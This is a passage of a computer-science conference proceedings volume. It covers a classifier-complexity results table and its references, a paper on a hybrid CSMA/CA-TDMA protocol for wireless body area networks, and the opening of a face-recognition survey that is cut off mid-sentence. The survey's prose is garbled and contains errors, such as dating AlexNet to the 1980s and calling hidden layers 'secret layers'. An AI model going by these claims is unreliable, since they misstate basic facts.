>50 NCL 0.7411 (0.09) 0.7028 0.584
(0.06) (0.22)
CT <20 CNN 0.9775 (0.045) 0.9875 0.9838
(0.025) (0.03)
20–30 NCL 0.9357 (0.13) 0.9438 0.9405
(0.11) (0.11)
31–40 OSS 0.7725 (0.18) 0.8897 0.8005
(0.02) (0.11)
41–50 NCL 0.7567 (0.17) 0.769 (0.11) 0.7643
(0.13)
>50 NCL 0.6856 (0.06) 0.6532 0.6698
(0.04) (0.04)
SVM <20 NCL 0.97 (0.045) 0.97 (0.05) 0.9598
(0.063)
20–30 OSS 0.97 (0.06) 0.843 (0.19) 0.8205
(0.27)
31–40 NCL 0.7639 (0.096) 0.8797 0.7763
(0.14) (0.12)
41–50 NCL 0.812 (0.12) 0.8547 0.7927
(0.13) (0.13)
>50 NCL 0.6731(0.09) 0.6711 0.6494
(0.13) (0.08)
LR <20 CNN 0.9775 (0.045) 0.9875 0.9685
(0.025) (0.063)
20–30 NCL 0.83 (0.24) 0.83 (0.22) 0.775
(0.336)
31–40 Tk_Link 0.7195 (0.13) 0.7943 0.757
(0.14) (0.12)
41–50 OSS 0.7527 (0.07) 0.7873 0.7693
(0.13) (0.09)
>50 NCL 0.5989 (0.16) 0.7566 0.6739
(0.07) (0.07)
Predicting Classifiers Efficacy in Relation with Data Complexity … 91
References
1. Branco, P., Torgo, L., & Ribeiro, R. P. (2016). A survey of predictive modeling on imbalanced
do- mains. ACM Computing Surveys, 49(2), 1–50.
2. Gosain A, Saha A, & Singh, D. (2016). Analysis of sampling based classification techniques
to overcome class imbalancing. In Proceedings 3rd international conference on computing for
sustainable global development (INDIACom) IEEE pp. (7320–7326).
3. Chawla, N. V., Bowyer, K. W., Hall, L. O., & Kegelmeyer, W. P. (2002). Smote: Synthetic
minority over-sampling technique. The Journal of Artificial Intelligence Research, 16, 321–357.
4. Estabrooks, A., & Jo, T., Japkowicz, N. (2004). A multiple resampling method for learning
from imbalanced data sets. Journal Computational intelligence, 20(1).
5. Gracia, S., & Herrera, F. (2009). Evolutionary undersampling for classification with imbal-
anced datasets: Proposals and taxonomy. Journal Evolutionary computation, 17, 275–306.
6. Anand, R., Mehrotra, K., Mohan, C., & Ranka, S. (1993). An improved algorithm for neural
net- work classification of imbalanced training sets, IEEE Trans. Neural Networks, 4, 962–969.
7. Bruzzone, L., & Serpico, S. (1997). Classification of imbalanced remote-sensing data by neural
networks. Pattern Recognition Letters, 18, 1323–1328.
8. Domingos, P. (1999). Metacost: A general method for making classifiers cost sensitive. In
Proceedings of fifth ACM SIGKDD international conference on knowledge discovery and data
mining, KDD ’99 (pp. 155–164). ACM, New York.
9. Zhou, Z.-H., & Liu, X.-Y. (2006). Training cost-sensitive neural networks with methods ad-
dressing the class imbalance problem. IEEE Transactions on knowledge and data engineering,
18, 63–77.
10. Basu, M., & Ho, T.K. (2006). Data complexity in pattern recognition. In Advance information
and knowledge processing. Springer.
11. Bernado-Manshilla, E., & Ho, T. K. (2005). Domain of competence of XCS classifier system
in complexity measurement space. IEEE Transactions on Evolutionary Computation, 9(1),
82–104.
12. Li, Y., Member, S., & Dong, M. (2005). Classificability-based omnivariate decision trees. IEEE
Transactions on Neural Networks, 16(6), 1547–1560.
13. Baumgartner, R., & Somorjai, R. L. (2006). Data complexity assessment in undersampled
classification of high-dimensional biomedical data. Pattern Recognition Letters, 12, 1383–
1389.
14. Yu, H., Ni, J., Xu, S., Qin, B., & Jv, H. (2014). Estimating harmfulness of class imbalance by
scatter matrix based class separability measure. Intelligent Data Analysis, 18, 203–216.
15. Gracia, S., Cano, J. R., Bernado-Mansilla, E., & Herrera, F. (2009). Diagnose of effective
evolutionary prototype selection using an overlapping measure. International Journal of Pattern
Recognition and Artificial Intelligence, 23(8), 2378–2398.
16. Anwar, N., Jones, G., & Ganesh, S. (2014). Measurement of data complexity for classification
problems with unbalanced data. Statistical Analysis and Data Mining, 7(3), 194–211.
17. Fernandez, L.M., Canedo, V.B., & Betanzos, A.A. (2016). Data complexity measures for
analyzing the effect of SMOTE over microarrays. In Proceedings European Symposium on
artificial neural networks, computational intelligence and machine learning (pp. 289–294).
18. Fernandez, L. M., Canedo, V. B., & Betanzos, A. A. (2017). Can classification performance
be predicted by complexity measures? A study using microarray data. International Journal
Knowledge and Information Systems, Springer, 51(3), 1067–1090.
19. Singh, D., Gosain, A., & Saha, A. (2020). Weighted k-nearest neighbor data complexity metrics
for imbalanced datasets. Journal of Statistical Analysis and Data Mining. https://doi.org/10.
1002/sam.11463
20. Jo, T., & Japkowicz, N. (2004). Class Imbalances versus small disjuncts. ACM SIGKDD Ex-
plorations Newsletter, 6(1), 40–49.
21. Denil, M., Trappenberg, T.P. (2010). Overlap versus imbalance. In Canadian conference on AI
(pp. 220–231).
92 D. Singh et al.
22. Barella, V. H., Garcia, L.P.F., De Souto, M.P., Lorena, A.C., & De Carvalho, A. (2018). Data
complexity measures for imbalanced classification tasks. In Proceedings international joint
conference on neural networks (IJCNN) (pp. 1–8). Rio de Janeiro. https://doi.org/10.1109/
IJCNN.2018.8489661
23. Brun, A. L., Britto, A. S., Jr., Oliveira, L. S., Enembreck, F., & Sabourin, R. (2018). A frame-
work for dynamic classifier selection oriented by the classification problem difficulty. Pattern
Recognition, 76, 175–190.
24. Xing, Y., Cai, H., Cai, Y., Hejlesen, O., & Toft, E. (2013) Preliminary evaluation of classifi-
cation complexity measures on imbalanced data. Proceedings Chinese intelligent automation
conference (pp. 189–196).
25. Yu, H., Ni, J., Xu, S., Qin, B., & Jv, H. (2014). Estimating harmfulness of class imbalance by
scatter matrix based class separability measure. Journal Intelligent Data Analysis, 18, 203–216.
26. Diez-Pastor, J. F., Rodriguez, J. J., Garcia-Osorio, C. I., & Kuncheva, L. I. (2015). Diversity
tech- niques improve the performance of the best imbalance learning ensembles. Information
Sciences, 325, 98–117.
27. Tomek, I. (1976). Two modifications of CNN. IEEE transactions on systems man and
communication SMC-6 (pp. 769–772).
28. Hart, P.E. (1968). The condensed nearest neighbour rule. IEEE transactions on information
theory IT-14 (pp. 515–516).
29. Kubat, M., & Matwin, S. (1997). Addressing the curse of imbalanced datasets: one sided
sampling. In Proceedings of 14th international conference on machine learning (pp. 179–186).
Nashville, TN.
30. Laurikkala, J. (2001). Improving identification of difficult small classes by balancing class
distribution. Technical Report A-2001-2, University of Tampere.
Enhanced Combined Multiplexing
Algorithm (ECMA) for Wireless Body
Area Network (WBAN)
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 93
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_8
94 P. Rani et al.
1 Introduction
A WBAN consists of different wearable sensors, which are used to monitor the
vital signs of a human body and an on-body coordinator. The MAC protocol [1] in
a WBAN defines a set of rules which regulate the activities of sensing equipment
in the network. The sensing devices are responsible for transmitting and receiving
data packet sleeping and idling. In case if the MAC protocol is not designed prop-
erly, it results in the energy loss in wireless body area network devices because
of many conditions for, e.g., overhearing, collisions, over emitting, idling and on–
off transitions. In general, the MAC protocols are classified into two categories:
Contention-free and contention-based MAC protocols.
In a contention-free MAC protocol, time is broken up into frames and that further
divided into time slots. The value (time slot) is assigned to a device during packet
transmission. The device can transmit packets at their allotted time slot and no other
device contained to transmit during this time slot. This protocol is used to eliminate
the collision problem inherent in the CSMA protocol.
In a contention-based MAC protocol, the shared medium is provided to transfer
data to all sensor devices. The performance evaluation depends on channel access
probabilities of all sensor devices in the network.
We have proposed to blend the strength of two algorithms CSMA/CA and TDMA.
We apply TDMA scheduling on nodes of less priority and those are not trans-
mitting frames for a long period of time. We can TDMA schedule can put in
between the contention phase of the super frame. The remaining node will follow the
CSMA/CA mechanism. On the other hand, in the CSMA/CA method the channel
requires to perform carrier sensing operation to make sure that the channel is free
for transmission.
2 Related Works
The BAN broadly used in the applications in the healthcare field. Healthcare field is
very susceptible. Therefore, the MAC protocols proposed for a BAN require addi-
tional care. MAC protocols are proposed widely. It has been noted that the TDMA [2]
and CSMA mechanisms are the most well known in MAC protocols [3] for a BAN.
TDMA is ideal in earlier times, as it gives improved execution in unsaturated traffic
conditions. A node that can be put as a sink node at waist and sensors for glucose
level and ECG are placed close to the sink node. These nodes have significant data of
patients that are mandatory to preserve high trustworthiness as far as node failure and
Enhanced Combined Multiplexing Algorithm (ECMA) for Wireless … 95
longer lifetime. The sensors transmit the information taken from the environment to
sink via forwarded information. It preserves energy of nodes and network works for
longer periods. Based on the cost function, the individual node decides whether that
node become a forwarder node or not.
A node with minimum cost function is preferred as a forwarder. The forward node
aggregates data and forward to sink. Forwarder node assigns a TDMA based time slot
to its descendant nodes. All the successor nodes transmit their data to the forwarder
node in its own scheduled time slot. Fang, G., and Dutkiewicz, E. [4] an energy
efficient MAC protocol (Body MAC) proposed by authors. It utilizes flexible band-
width allocation to enhance node energy effectiveness by dropping the probability of
packet collisions. Body MAC depends on the Downlink and Uplink method in which
the contention-free part in the Uplink subframe that is totally collision free. Liu, B.,
Yan, Z., and Chen, C. W. [5] proposed a context-aware MAC protocol using a hybrid
of contention based and TDMA multi access method to deal with loss channels by
adaptively modifying MAC frame structure. Schedule-based and polling-based tech-
niques are also utilized to manage periodic, emergency traffic prerequisite. Reference
[6, 7] the paper proposed TDMA-based MAC protocol design. 24 nodes are taken
for Simulations. This technique tries to enhance energy utilization with a TDMA
scheme. In the unscheduled wake up process, all the nodes in the network have an
autonomous wake up plan. Since they do not know the clue about the wake up plan
of other devices, carrier sensing (CS) is utilized to avoid collisions.
Enhanced MAC protocol [8] was proposed to enhance the lifetime where end-to-
end delay transmission is focused. To improve the lifetime, author analyze different
model. Also, author has implemented cross-layer collaboration between the node so
that lifetime can be improved.
Author [9] proposed work in which five parts of energy consumption was divided
into different task. In this paper, task was prepared to provide framework, in which
is based on observed request every node take decision for the next. The proposed
work divides these tasks into five energy consuming parts. Efficiency of application
and consumption of energy can be interchanged with reference to reward function
thereby in term of performance result can be improved. Further performance can
also be improved by interchanging the data among neighboring nodes.
3 Proposed Model
The protocols in MAC a WBAN limits some protocol which controls the conduct
of sensor gadgets in the network. Transmitting information packet, receiving infor-
mation packet, idleness, or sleeping are the main activities of a sensor device. If
the Mac protocol is not designed well then it can achieve the wastage of energy
for, e.g., collisions, overhearing, idling, over emitting and on–off transitions. Quality
96 P. Rani et al.
of service attribute is vital for high-quality Mac protocol in WBAN. Since the vast
amount of energy is required to transmit data over wireless medium, communication
requirement is fulfilled by MAC protocol therefore it is important to implement it for
the network. Poor throughput and energy wastefulness, characteristics of CSMA/CA
make it less suitable for WBAN. On the other hand, the advantage of TDMA is that it
is collision free as its slots are fixed but its main drawback is that it suffers from one
major problem, i.e., scalability. That is the reason we have combined the property of
both CSMA/CA and TDMA to improve the MAC protocol performance. That is the
reason in super frame, the schedule of TDMA will be placed in between the contention
phase for the nodes which have been idle for the longest time. On the other hand,
CSMA/CA protocols will be followed by remaining nodes. To identify the node to
be accessed by which channel, i.e., CSMA/CA or TDMA is decided by our proposed
algorithm and quality of service will further be increased by this algorithm. Beacon
will be sent by coordinator in every beacon period or super frame. In contended allo-
cations communication will be started by nodes with the following sequence EAP1,
RAP1 up to n number of EAP and up to n number of RAP, respectively (Fig. 1).
Let n denote the number of sensor nodes, delay is di of every node where i denotes i
= 1–n. Average delay will be calculated in the first round. Average delay of the same
node will be calculated in the second round. The procedure will continue when the
node’s delay is not converged. The procedure will continue for a given number of
nodes.
Same priority nodes will be grouped, and then similar priority nodes average delay
will be calculated. After that compare average delay di of every node and average
delay di of similar priority grouped node. If each node’s average delay is less than
or equal to similar priority grouped nodes average delay, then allocate CSMA/CA to
those nodes. If each node’s average delay is larger than or equal to similar priority
grouped nodes average delay, then allocate TDMA to those nodes.
Enhanced Combined Multiplexing Algorithm (ECMA) for Wireless … 97
GTS, i.e., guaranteed time slots will be placed on the beacon frame at the starting of
every super frame by coordinator. If each node’s average delay is less than or equal
to similar priority grouped nodes average delay, then allocate CSMA/CA to those
nodes. If each node’s average delay is larger than or equal to similar priority grouped
nodes average delay, then allocate TDMA to those nodes else CSMA/CA is used
during CAP for transmitting the data.
Duration of CAP will remain idle when GTS slots have been assigned to the node
and in the CFP period data packet will be sent or else in CAP period transmission
will be put off. After transmission, during the assigned GTS slot, nodes will wait
for successive beacon frames. Sensor devices or nodes will remain in the idle state
98 P. Rani et al.
after dispatching the packet in CAP if extra packets are not in the buffer to send else
CSMA/CA will be started again. For transmission of packets if CAP length is not
sufficient or for a given super frame CAP length is ended then transmission of nodes
will be put off. The detailed method is shown in Fig. 2, i.e., how CSMA and TDMA
will work further once a node has been assigned the channel access mechanism.
In this section by using IEEE 802.15.6 standard [10] parameters and condition, the
performance of the CSMA/CA mechanism and our proposed model will be analyzed.
To enhance the quality of service in wireless body area networks is the main goal of
this paper so that the amount of energy consumed by WBAN is minimized. TDMA
and CSMA/CA to be assigned to which sensor node is being decided by our proposed
model which will further increase the performance of WBAN. MATLAB simulation
is used for generating the results.
To get the average delay, we simulate our algorithm 30 times for 10 nodes as shown
in Fig. 3. As shown in the result that for our proposed model delay gets minimized
for some number of nodes only, while for the rest of other nodes delay gets increased.
As we run the simulator, allotment of slots of CSMA/CA and TDMA to nodes will
get different each time. To get the average delay we simulate our algorithm 30 times
for 20 nodes as shown in Fig. 4. As shown in the result that for our proposed model
delay gets minimized for some number of nodes only while for the rest of other nodes
delay gets increased. CSMA will be allocated to node as shown in Fig. 3, i.e., 2, 3, 4,
6, 7, 8, 10, 14, 15, 17, 19, 20 as their delay of proposed model is larger than CSMA
delay. In contrast, TDMA will be allocated to node as shown in Fig. 3, i.e., 5, 9, 11,
12, 13, 16, 18 that is the delay of proposed model is less than CSMA delay. On the
other hand, this is not a major problem as in practical application of WBAN, there
are a small number of sensor nodes which are placed on the body so the number of
devices that are mounted on body are relatively very small.
7 Conclusion
In this paper, we have studied different multiple access techniques of MAC protocols
that are exploited in wireless body area networks. MATLAB simulation is used for
comparing CSMA/CA and our proposed model.
Number of nodes is compared with average delay. Analysis of CSMA/CA and
proposed models will be measured using MATLAB simulation.
Increased number of devices does not affect the average delay. Results of simu-
lation shows that number of sensor nodes if we increase does not have greater effect
on it. However, this is not a major problem as in practical application of WBAN,
and there are a small number of sensor nodes which are placed on the body so the
number of devices that are mounted on the body are relatively very small.
References
1. Mahapatro, J., Misra, S., Manjunatha, M., & Islam, N., (2012, Dec). Interference-aware channel
switching for use in WBAN with human-sensor interface. In 2012 4th International Conference
on Intelligent Human Computer Interaction (IHCI) (pp. 1–5). IEEE.
2. Toumanari, A., & Latif, R. (2014, April). Performance analysis of IEEE 802.15. 6 and IEEE
802.15. 4 for wireless body sensor networks. In 2014 International Conference on Multimedia
Computing and Systems (ICMCS) (pp. 910–915). IEEE.
3. Latr, B., Braem, B., Moerman, I., Blondia, C., & De- meester, P. (2011). A survey on wireless
body area networks.Wireless Networks, 17(1), 1–18.
Enhanced Combined Multiplexing Algorithm (ECMA) for Wireless … 101
4. Fang, G., & Dutkiewicz, E. (2009, Sept). Body- MAC:Interference mitigation between WBAN
equipped patients. In ISCIT 2009 9th International Symposium on Communications and
Information Technology, 2009 (pp. 1455–1459). IEEE.
5. Liu, B., Yan, Z., & Chen, C. W. (2011, June). CA- MAC: A hybrid context-aware MAC
protocol for wireless body area networks. In 2011 13th IEEE International Conference on
e-Health Networking Applications and Services (Healthcom) (pp. 213–216). IEEE.
6. Shrestha, B., Hossain, E., & Choi, K. W. (2014). Dis- tributed and centralized hybrid
CSMA/CA-TDMA schemes for single-hop wireless networks. IEEE Transactions on Wireless
Communications, 13(7), 4050–4065.
7. Fang, G., & Dutkiewicz, E. (2009, Sept). Body- MAC: Energy efficient TDMA-based MAC
protocol for wireless body area networks. In ISCIT 2009 9th International Symposium on
Communications and Information Technology, 2009 (pp. 1455–1459). IEEE.
8. Alrabea, A., Alzubi, O., Alzubi, J. (2020). An enhanced Mac protocol design prolong sensor
network lifetime. International Journal on Communication Antenna Propagation 10. https://
doi.org/10.15866/irecap.v10i1.17467
9. Alrabea, A., Alzubi, O. A., Alzubi, J. A. (2019). A task-based model for minimizing energy
consumption in WSNs. Energy System 1–18.
10. Bhatia, A., Patro, R. K. (2014). Emergency handling in MICS based body area network. In 2014
IEEE International Conference on Electronics, Computing and Communication Technologies
(CONECCT) pp 1–5.
A Survey: Approaches to Facial
Detection and Recognition with Machine
Learning Techniques
1 Introduction
In the present situation, object identification and recognition are a very complex
and daunting topic in pattern processing, computer vision, neural networks, and
machine learning. This subject is being debated in numerous learning communities,
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 103
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_9
104 P. Singhal et al.
such as the controller community and the unregulated world. Facial implementations
involve the recognition of 2D facial representations and the creation of different facial
descriptors using various learning strategies. A new method for researchers in the
area of artificial intelligence in face detection and recognition has been found in
recent advances of deep learning. It is a finding of objective objectives, and a rapidly
growing technique to be used for face detection and recognition is very popular. It
has been designed to address the dynamic problem of machine learning. It worked
on a human and machine-based problem. Deep learning is an innovative theory
and a technique-based method for identifying faces for recognition and verification.
In deep learning, the machine wants to be a learner and executes the process of
classification directly to the next video and pictures. It solves the state-of-the-art
dilemma and improves the accuracy and efficiency of human beings. Deep learning
has bounded and educated named data in neural network architecture. This involves
several layer numbers in the neural convolution network. Hidden layer served as a
bridge between input and output layers. They are working on a basic and complicated
type of pictures. Identification and authentication problems are solved by using the
full number of layers contained in the secret layer. The first introduction of deep
learning and theory is produced in 1980s. The following reasons they become a
powerful concept for feature extraction using in face detection and recognition.
It has the best machine learning principles. They have been used in pattern recog-
nition, computer vision, and machine learning. Convolution neural network is the
best method for evaluating past information or evidence to solve a possible problem.
It relies on the transformation of the input image to translate to the output image
using several hidden layers. It is correlated with machine learning and pattern anal-
ysis. In 1980, Kanihiko Fukushima suggested the use of neural network archi-
tecture to address the image recognition problem. Study has been performed on
geometric patterns used in image processing for facial identification and recognition.
Researchers are focused on the issue of image and video recognition and authentica-
tion. They have a lot of ideas to solve the issue of facial identification and recognition.
In a deep learning approach, the term deep refers to the idea of the amount of hidden
layers found in max pooling networks. Generally, there are two or three layers, but
deep networks examine hundreds of layers. Though deep learning is focusing on
facial identification and recognition, higher accuracy has been achieved. They will
help us make sense of their aspirations. Deep learning is operating like a robot, and
it requires artificial intelligence. They will learn their functionality with the aid of a
function extract in which the functionality is derived from hidden layers.
Figure 1 demonstrates the neural convolution network architecture based on the
interaction between input, output, and hidden layers. Neural network architecture
helps organize a collection of interconnected nodes in the layers of redundancy.
What layers are known as hidden layers? The characteristics of the input images
A Survey: Approaches to Facial Detection and Recognition … 105
Fig. 1 Architecture of CNN from relationship between i/p, o/p, and hidden
are classified and compared to the storage images. Secret layer holds the highest
number of layers for apps. They identified different-different attributes in a basic and
complex picture in datasets. Figure 1 represents the model architecture of the neural
convolution network to be used in the mixture of the input, secret, and output layers.
These layers are the most important component of the neural convolution network,
since they interpret all the features of the input images and label them in hidden
layers according to their characteristics. Organize the output of the input images.
It has been used for a significant number of classified data in datasets. This is the
corresponding sequence of features that are specifically involved in datasets and that
are used without manual field extractions. A deep neural network is a mixture of
nonlinear computation layers used in machine learning and pattern analysis. They
are interconnected with several layers such as the input layer for input data, the
secret layer for functions, and the output layer for an object. Deep learning addresses
the issue of faces in real-time photographs and databases. They started focused on
capturing photos, and they are normalizing the networks. Deep learning is focusing on
the widest technologies and ranging to enhance the efficiency of facial identification
and recognition. It solves the associated problems of the faces using convolutions
neural network architectures. Deep learning has the newest idea and definition to
develop face-related problems in a real-time world.
106 P. Singhal et al.
Alex Net is the first deep learning system developed in the 1980s by Geoffery Hinton
and his colleagues. It is a very popular and simple model for researchers to solve the
problem of face detection and recognition. It has a simple architecture to merge the
convolutionary layer with the total pooling layers. There is a mix of a convolutionary
layer, multiple pooling and a totally linked layer in a deep neural network. They
gathered a lot of information from the data and stored it in a convolution network,
including various types of hidden layers. So they’re divisions of the input object. The
deep neural network in Fig. 2 collects an input image and defines an entity or groups
an entity. They are classified as an entity that has productive outputs.
In Fig. 2, the input image used the test images in this network model, after gath-
ering the training data, the network model starts to recognize the basic features of
the object and is correlated with this image in the corresponding categories.
In this deep neural convolution, each layer incorporates data or image from the
previous layers and transfers it to the next layers. This model increases the precision
and consistency of all image data from layer to layer. Deep convolution of the neural
network is operating in various layers. The convolution layer holds the input image
from a neural transform network sequence. This forward translation understands
the characteristics of the pictures. Pooling layer simplifies performance by doing a
nonlinear reduction, down by averaging the number of measurements to be used for
the features of the images.
The fully connected layer plays a part in the identification of the object. After
completing the detection function of the deep convolution network, they would go to
the next layer called the fully linked node. It has the last and least significant layers
in the deep convolution neural network to classify and define the categories of the
entity. It includes a k-dimensional vector, where k is defined as a number of functions.
This model forecasts the characteristics of the network. These vectors include the
probabilities of each layer and class to be identified in each image.
It has the most common deep learning algorithm. It is going to work on the role of
the faces of machine learning. It succeeded to define the characteristics of the input
layers. They do not use a manual extraction feature. They require a time tranfer the
information. The features of the databases have been solved and categorized. Figure 3
displays the architecture of the forward feed model network containing both weight
and bias elements. They often contain a three-layer structure, since several neural
networks have been allocated. The hidden layers shown in Fig. 3 are identified in
this model h. They conducted voi (output layer), h has hidden layer and voi as bias
layers. Bias has been applied to the network model as weights. The amount is always
1. They demonstrate the sum of output layers converting the data. Three layers are
found in Fig. 3 of the feed forward network architecture. The correspondence between
layer collections is proving to be a successful outcome. The input layers × 1–xn are
connected to the hidden layer h1–hn layers. They were connected to the output layers
y1–yn and interacted and interconnected with weight and bias in the network model.
They are going in the opposite direction. Computational sophistication depends on
the number of layers hidden. They achieve high fidelity in network models. The bias
is more efficient when dealing with input and output layers.
It transmitted a nonlinear model using a limited number of layers. It has worked the
faces and understands the application of machine learning. This network has dele-
gated several hidden layers to different face features used. These layers are dealing
with neurons or nodes. DCNN interpreted the set of objects and, after processing,
immediately identified the face of the object to the corresponding input images. The
data named function in DCNN has training data in datasets. It has been used to recog-
nize images and to place these attributes in specific groups of datasets. DCNN has
moved the previous data to the set of functionality in the next layers of the architec-
ture. DCNN increases the consistency and precision of the piece. They are working
on a trend in DCNN from layer to layer.
KNN algorithm is one of the better algorithms for adding the closest neighbor or
node functions. They are always also known as slow algorithms. K is the number of
iterations. This algorithm is easy to understand and interact with each other. K-closest
neighbor algorithm is based on the closest entity features node. But it performed as
a non-parametric algorithm. The word non-parametric does not require any claims
about the underlying distribution of data. They used the true word storage method.
Full functional data does not come within the traditional theoretical study of the
function learning mechanism. KNN algorithm chooses the closest function space in
the database. These features depend on the minimum distance or, perhaps, multi-
dimensional vectors. Since the space point function is a notion of distance. The
non-parametric algorithm, like the K-nearest neighbor algorithm, arrives to solve
this problem in the databases.
It has a very efficient and effective classifier that is used in machine learning. In
support vector machine classifiers, the distinction between point and decision surface
of face detection and recognition must be maximized. It has the nearest decision
surface and points after choosing points on the decision surface and then generates
a distance from the decision surface. The closest point is known as the support
vector point. The use of these support vectors in the machine is called support vector
functions. It maximizes the margin of width and distance of the nearest points and
compares its characteristics from one point to another. Once this process has been
completed, the faces in the databases are remembered.
A Survey: Approaches to Facial Detection and Recognition … 109
It has a very common and oldest technique for image processing and pattern analysis.
This was developed by Pearson (1901) and improved by Hotlling (1933). It worked
on the Eigen value and the Eigen vectors using the matrix method. It has used
various applications for different varieties. The definition of PCA needs to reduce
the dimensionality of the databases. It is capable of a huge range of datasets. The
capabilities are linked to the remaining available databases in the scheme.
3 Feature Extraction
It has a very common method to be used to remove features from images for
facial identification and recognition. It has been commonly used in a number of
methods, such as optical image recognition, pattern detection, machine vision, and
deep learning. The input materials or pictures have been converted into pixels. This
pixel worth has turned a mix of features into a database since the chosen features
provide the most relevant details in the original data. It is also useful for biometric
applications and machine learning.
It has the most effective tool for facial identification and recognition. They use
software classification approaches based on facial identification and recognition.
Holistic feature extraction used by any local extraction process is a source of data
information which eliminates the usual processing that defines broad data from
images in the database. Holistic-based feature extraction transforms the image into a
low-dimensional feature space that increases the discriminant capacity of the images.
Table 1 provides the overview of machine learning facial detection and identification
in images in the videos. Table 1 also shows the facial identification and recognition
approaches using different strategies and datasets with accuracy. Table 1 further
illustrates the benefits and demerits of the approach by using various authors using
their own image definitions for datasets that have been shown to be related. The table
shows various strategies and approaches—distinct. Various scientists have used them
to have the best facial identification and recognition results. Also the methods used in
facial detection and identification are classified. The table description provides a full
overview of the approaches that classify the problems of faces in various settings.
They are attempting to solve the new face detection and identification issue found in
the existing scenario (Table 2).
Face detection and recognition applications are using on 2D dimensional face images.
They need large number of feature matching in different techniques. Using learning
applications, they have improved the accuracy of face images in datasets. The impact
factor of pose, illumination, and expression is the basic and complete information
A Survey: Approaches to Facial Detection and Recognition … 111
Table 1 (continued)
Year Description
Xuanyi Dong et.al. (2018) suggested multi-model and self-paced learning algorithms for
detection (MSPLD) and few example object detection (FEOD) for face detection and
recognition. These models have used a large number of unidentified picture pools and a
few named images per group. They use various detection frameworks for discriminant
information. This approach provides stronger performance in PASCAL-VOC2007,
PASCAL-VOC2012, MSCOCO2014, ILSURC2013, and ImageNet-COCO datasets [9]
Mehdi Mafi et.al. (2018) introduced a switching-based adaptive median and fixed-based
weighted mean filter (SAMFWMF) for facial detection and recognition. Same edge
detection and sharpening have been regulated by SAMFWMF in Lena (5,128,512),
Cameraman (250 × 250), Coins (300 × 246), and Checkboard (256 × 256) pictures.
SAMFWMF achieves better systemic metrics. They are best resolved by entering into a
contract with another traditional thresholding tool to detect faces and then identify them
[10]
Dapeng Tao et al. (2018) suggested a model of the tensor rank preservation discriminant
analysis (TRPDA) technique to solve the issue of facial identification and recognition.
They achieved robust results and generated high rates in UMIST, ORL, and
CAS-PEAL-R1 datasets. TRPDA has extracted the knowledge rating and exclusion
function. They are a flexible way of studying the face for identification and recognition
[11]
Wei Wang et.ai. (2018) introduced chronic facial aging (RFA) and RNN for facial
diagnosis and identification. RFA improved 65.43% and the accuracy of the bilayer
increased 61%. It indicates that RFA performs marginally better than the RNN bilayer.
The author uses LFW and CACD datasets to enhance face detection and recognition
performance. RFA system consists of triple layer GRU, providing improved output of
identity information in the GRU bilayer for facial detection and recognition [12]
Seunghwa Jeong et.al. (2018) Markov has used random field energy modeling. In
specific, this approach functions as a large baseline multi-view system. This segmentation
approach increased efficiency with a comparable consistency. This has been created in the
latest state-of-the-art design. They also collected functionality in different critical
conditions. They provided the full number of rotations, views, and distances between the
cameras captured. A sparsely defined baseline has been collected quite efficiently [13]
Christos Sagonas et.al. (2018) suggested joint and human variation clarified (JIVF) and
robust-JIVE (RJPVE) for facial identification and recognition. They have increased the
quality of the ears. Details on the faces remaining in the RJIVE-based progression of
FG-NET datasets were also defined. Accuracy depends on the pair of photographs
compared to the age difference [14]
Xiangyu Zhu et.al. (2018) based on 3D complex alignment (3DDFA) and 3D Morphable
Interface (3DMM) for facial identification and recognition. Face balance included the
entire posing spectrum. It has achieved variance in the face orientation of the ALFW,
AFW, LFPW, HELEN, IBUG, 300 W, and AFLW 2003D datasets. Comparing the output
of the drop is substituting boundary poses. This approach shows the highest robustness of
initialization of 3DDFA in face identification and recognition [15]
Mei Wanget.ai. (2018) have adapted it to a variety of various strategies. This was used in
the identification and recognition of the face [16]
(continued)
A Survey: Approaches to Facial Detection and Recognition … 113
Table 1 (continued)
Year Description
Changxing Ding et.al. (2018) suggested controlled face function (CPF) for facial
identification and recognition. Using CPF in large-scale studies reveals dominance in
both learning representation and spinning frontal images. The face recognition
experiment in the MultiPIE database offers further information that shows the role of
intensity in particular methods [17]
C. Fabian Benitez-Quiroz et.al. (2018) introduced a facial control device for the
identification and recognition of the face. The facial action device has been developed
to address the issue of recognition using robust machine vision algorithms. These
datasets are used for color functionality by DISFA and AM-FED. This color can also
be used to identify the triggering of the action unit [18]
Cristóvao Cruz et.al. (2018) suggested a single image super resolution (SISR) and CNN
for facial identification and recognition. 1D Wiener filtering operates on resemblance
domains. They are given an appropriate solution to the particular issue of the SISR. Ses
results are sharper reconstruction and in SET5, SET14 and metropolitan datasets. This
approach works well only on the picture of significant self-similarity [19]
2017 Xiaolong Wang et.al. (2017) have suggested a cross-age face authentication algorithm for
facial detection and recognition problems. They also focused comparatively on an
successful compromise between the share of features and the omission of features [20]
Chi Nhan Duong et.al. (2017) suggested a temporary non-volume preservation (TNVP)
and generative adversarial network (GAN) for facial identification and recognition using
FG-NET, MORPH, CACD, and AGFW datasets. TNVP measured both the synthesizing
of advanced age faces and the cross-face testing period with accuracy. TNPV has
promised an appealing density property. They collected information on features and
inferred the importance of successive phases of the face in the assessment of embedded
datasets [21]
Ran He et.al. (2017) suggested infrared visual verses (VSS-NIR) and invariant deep
representation (IDR) using CASIA, NIR-VIS2.0, and broad scale VIS datasets for facial
identification and recognition. In large-scale VIS results, they achieve 94% of the
verification rate compared to the state of the art. This lowers the error rate by 58% only
for a lightweight 64D representation [22]
Lanquering Hu et. al. (2017) suggested an learning displacement field network (
LDP-NET) system for facial identification and recognition using MultiPIE datasets. It
performed on the front end, which offers this insightful information from the datasets.
LDF-NET has achieved increased facial identification and recognition efficiency around
the face [23]
Christain Galea et.al. (2017) focused on the deep convolution neural network (DCNN)
approach to understand facial detection and identification using VGG facial, PRIP HDC,
MEDS II, FRGCV2.0, and MultiPIE. The error rate was lowered from 80.7 to 32.5% by
the use of forensic real-world drawings. The Morphable model has been used to alter
faces from facial features and automatically produces close images [24]
Rajeev Ranjan et.al. (2017) suggested a single deep convolution neural network
(SDCNN) and multitask winning system (MTL) to be used for face detection and
recognition. Ses findings demonstrate the perception of the faces of the networks and the
